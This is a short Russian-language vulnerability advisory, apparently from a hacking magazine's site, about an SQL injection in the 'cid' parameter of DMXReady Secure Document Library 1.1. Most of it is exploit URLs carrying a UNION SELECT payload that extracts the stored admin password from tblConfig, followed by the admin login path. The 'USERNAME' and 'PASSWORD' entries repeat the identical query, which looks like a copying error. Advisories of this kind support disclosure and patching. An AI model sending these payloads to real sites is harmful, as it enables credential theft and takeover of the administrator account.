SQL-инъекция в DMXReady Secure Document Library

Рекомендуем почитать:

Хакер #306. OAuth от и до

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: DMXReady Secure Document Library 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cid» сценарием upload_image_category.asp.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[target]/[path]//admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=[SQL
Inject]

You Find:

http://[target]/[path]/applications/SecureDocumentLibrary/inc_securedocumentlibrary.asp

Edit:

http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=
[SQL Inject]

USERNAME:

/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321
union select 2,Security_AdminPassword,4,5,6,0 from tblConfig

PASSWORD:

/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321
union select 2,Security_AdminPassword,4,5,6,0 from tblConfig

Admin Login:

/admin/SecureDocumentLibrary/admin.asp